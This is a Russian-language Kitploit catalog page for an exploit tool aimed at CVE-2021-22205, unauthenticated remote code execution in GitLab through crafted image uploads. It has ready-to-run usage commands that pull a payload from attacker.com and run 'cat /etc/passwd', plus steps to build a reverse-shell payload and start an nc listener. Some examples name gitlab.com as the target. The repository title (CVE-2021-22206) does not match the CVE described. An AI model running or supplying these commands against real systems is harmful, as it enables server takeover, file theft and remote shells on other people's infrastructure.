Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-22206 — Эксплойт для CVE-2021-22205, нацеленный на неаутентифицированное удалённое выполнение кода в GitLab через вредоносную загрузку файла. Предоставляет proof-of-concept код для тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/dannymas/cve-2021-22206
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubdannymas/cve-2021-22206

CVE-2021-22206

Эксплойт для CVE-2021-22205, нацеленный на неаутентифицированное удалённое выполнение кода в GitLab через вредоносную загрузку файла. Предоставляет proof-of-concept код для тестирования безопасности.

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-22205

CVE-2021-22205 — это эксплойт для GitLab, использующий неаутентифицированное удалённое выполнение кода (RCE) через загрузку изображений. Уязвимость присутствует в GitLab CE/EE, начиная с версии 11.9 и до 13.10.2. Для эксплуатации требуется только возможность загрузки изображений в GitLab. Никакой аутентификации не требуется, если загрузка изображений разрешена для неаутентифицированных пользователей (что часто встречается в общедоступных инстансах GitLab).

Этот эксплойт использует уязвимость в exiftool (CVE-2021-22204) для достижения выполнения кода.

Затронутые версии

ВерсияСтатус
>= 11.9, < 13.8.8Уязвима
>= 13.8.8, < 13.9.6Уязвима
>= 13.9.6, < 13.10.3Уязвима
>= 13.10.3Исправлена

Использование

root@kitploit:~
python3 exploit.py -t http://target.com -u http://attacker.com/payload.jpg

Аргументы

АргументОписание
-t, --targetURL-адрес цели (обязательно)
-u, --urlURL-адрес полезной нагрузки (обязательно)
-p, --proxyПрокси-сервер (например, http://127.0.0.1:8080)
-c, --commandКоманда для выполнения (по умолчанию: id)
-m, --methodМетод HTTP: GET или POST (по умолчанию: POST)
-e, --endpointКонечная точка загрузки (по умолчанию: /uploads/user)
--sleepВремя ожидания ответа в секундах (по умолчанию: 5)
--outputФайл для сохранения выходных данных
--verboseПодробный вывод

Примеры

root@kitploit:~
# Базовая эксплуатация с выполнением команды `id`
python3 exploit.py -t http://gitlab.com -u http://attacker.com/payload.jpg -c id

# Эксплуатация с прокси-сервером для отладки в Burp Suite
python3 exploit.py -t http://gitlab.com -u http://attacker.com/payload.jpg -p http://127.0.0.1:8080

# Эксплуатация с указанием собственной команды
python3 exploit.py -t http://gitlab.com -u http://attacker.com/payload.jpg -c "cat /etc/passwd"

# Сохранение выходных данных в файл
python3 exploit.py -t http://gitlab.com -u http://attacker.com/payload.jpg --output output.txt

Создание полезной нагрузки

Вы можете создать полезную нагрузку (payload.jpg), следуя инструкциям из этого репозитория. Либо использовать предоставленный скрипт generate_payload.py:

root@kitploit:~
python3 generate_payload.py -u http://attacker.com/shell.jpg -o payload.jpg

Примечание: URL-адрес полезной нагрузки должен быть доступен с сервера GitLab. Если цель размещена локально, возможно, потребуется использовать такие сервисы, как ngrok, для предоставления вашей полезной нагрузки наружу.

Коллаб

Файл payload.jpg в каталоге collab/ включает полезную нагрузку, которая отправляет обратное подключение к 127.0.0.1:4444. Вы можете переключить IP-адрес и порт в файле shell.sh, а затем перегенерировать полезную нагрузку, используя предоставленный скрипт.

root@kitploit:~
# 1. Отредактируйте shell.sh
# 2. Перегенерируйте полезную нагрузку
python3 generate_payload.py -u http://attacker.com/shell.jpg -o payload.jpg
# 3. Запустите прослушиватель
nc -lvnp 4444
# 4. Выполните эксплойт
python3 exploit.py -t http://gitlab.com -u http://attacker.com/payload.jpg

Ссылки

  • CVE-2021-22205
  • CVE-2021-22204
  • GitLab Security Release
  • ExifTool CVE-2021-22204

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и тестирования на проникновение с соответствующим разрешением. Использование этого инструмента в незаконных целях строго запрещено. Разработчик не несёт ответственности за любой неправильное использование этого инструмента.

Скачать инструмент